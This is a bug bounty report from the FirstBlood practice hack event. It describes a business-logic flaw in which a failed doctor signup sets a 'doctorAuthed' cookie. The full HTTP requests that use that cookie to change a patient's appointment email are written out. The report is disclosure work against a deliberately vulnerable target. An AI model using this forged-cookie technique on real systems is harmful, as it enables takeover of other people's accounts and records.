FirstBlood-#65DoctorAuthed cookie given at /register.php can be used to modify patient email at Appointment Form /manageappointment.php



On 2021-05-09, 0xconft reported:

Hi there,

When i test to register as doctor at /register.php endpoint with invalid data i got my cookie set to "doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9" where i can use this cookie to modify patient email at Appointment Form /manageappointment.php.

This bug can be chained with my previous report "aptid enumeration via http://firstbloodhackers.com:49276/api/qa.php can be used to leak Appointment data"

PoC of getting doctorAuthed cookie Request

POST /register.php HTTP/1.1
Host: firstbloodhackers.com:49280
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://firstbloodhackers.com:49280
Connection: close
Referer: http://firstbloodhackers.com:49280/register.php
Upgrade-Insecure-Requests: 1

action=register&username=duh&inviteCode=1111111

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 18:58:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; expires=Sun, 09-May-2021 19:58:55 GMT; Max-Age=3600; path=/
Content-Length: 11014

-snip-

PoC of changing Sean Zseano's email address Request

POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49280
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 136
Origin: http://firstbloodhackers.com:49280
Connection: close
Referer: http://firstbloodhackers.com:49280/manageappointment.php?success&aptid=15a49a94-8db6-4f64-875c-4de449d755ed
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9

message=Advised to rebook appointment as I missed my previous one&id=15a49a94-8db6-4f64-875c-4de449d755ed&[email protected]

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 18:52:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 7

success

And zseano email will be changed to [email protected] (screenshoot attached)

Best Regards, 0xconft

P2 High

Endpoint: /manageappointment.php

Parameter: email

Payload: [email protected]


FirstBlood ID: 7
Vulnerability Type: Application/Business Logic

The endpoint MA.php (to modify an appointment) only allows for certain values to be modified, however due to some application logic error, if the user has tried to signup as a doctor and has the cookie "doctorAuthed" set, then it allows them to modify the email address for any appointment.


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.